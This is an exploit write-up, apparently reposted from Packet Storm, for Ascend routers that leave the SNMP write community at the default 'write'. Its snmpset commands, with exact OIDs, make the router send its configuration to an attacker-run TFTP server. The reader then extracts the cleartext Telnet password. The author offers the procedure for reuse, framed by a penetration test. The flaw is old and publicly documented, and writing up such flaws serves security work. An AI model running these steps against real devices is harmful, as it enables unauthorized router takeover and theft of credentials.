SUID Advisory #2 - Exploit for ascend router bugs as per NAI advisory.
8205e35efb8995ce9612e8285e123dadb6501023b4f5997f06706dd7fd8610a9suid@suid.kg - exploit for ascend router bugs as per nai advisory:
http://www.nai.com/nai_labs/asp_set/advisory/26_ascendrouter_adv.asp
Summary:
Ascend routers running version 5 of The Ascend OS (TAOS) by default have SNMP write enabled and the default community
name of "write".
For a long time Ascend Pipeline and MAX series routers/access servers have been vulnerable to this attack. Although it
is widely known about and fixed, many boxes are still vulnerable to it.
ADM seem to have an exploit for this allready, although I do not know if they have published it. See ADMsnmp scanner
for SNMP scanning help.
I am writing this up because I had the need to use it one day on a client penetration test. I may need to refer to it
again some day. As may you.
Exploit Information:
For this exploit to work, the routers write community must be enabled and set to "write"
You will need to use something like ucd SNMP tools set the following object ID's:
sysConfigTftpHostAddr (1.3.6.1.4.1.529.5.3.0) Type = IP Address
sysConfigTftpFilename (1.3.6.1.4.1.529.5.4.0) Type = String
Now setup a TFTP server somewhere. Make sure the router you are targetting can write a file there if it wants to.
Set the sysConfigTftpHostAddr OID to the IP address of your TFTP server:
$ snmpset <router> write .1.3.6.1.4.1.529.5.3.0 a "<ip of your TFTP server>"
Set the sysConfigTftpFilename OID to a filename writable on your TFTP server.
$ snmpset <router> write .1.3.6.1.4.1.529.5.4.0 s "<filename>"
Next set the sysConfigTftpCmd OID on the router to 1 (Save)
$ snmpset <router> write .1.3.6.1.4.1.529.5.1.1.0 i 1
The router will begin to save its configuration file to your TFTP server. Grep for "Telnet PW".
You now have the Telnet password to the router in cleartext.
Notes:
- All this information was discerned from ascend.mib from ftp.ascend.com
- This problem has been known about since March 1998.
- The Ascend web site has some information regarding what to do if your router is vulnerable to this at:
http://www.ascend.com/2694.html
Links:
- Ascend http://www.ascend.com/, http://www.ascend.com/2694.html
- NAI http://www.nai.com/, http://www.nai.com/nai_labs/asp_set/advisory/26_ascendrouter_adv.asp
- ADM ftp://adm.isp.at/pub/ADM/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed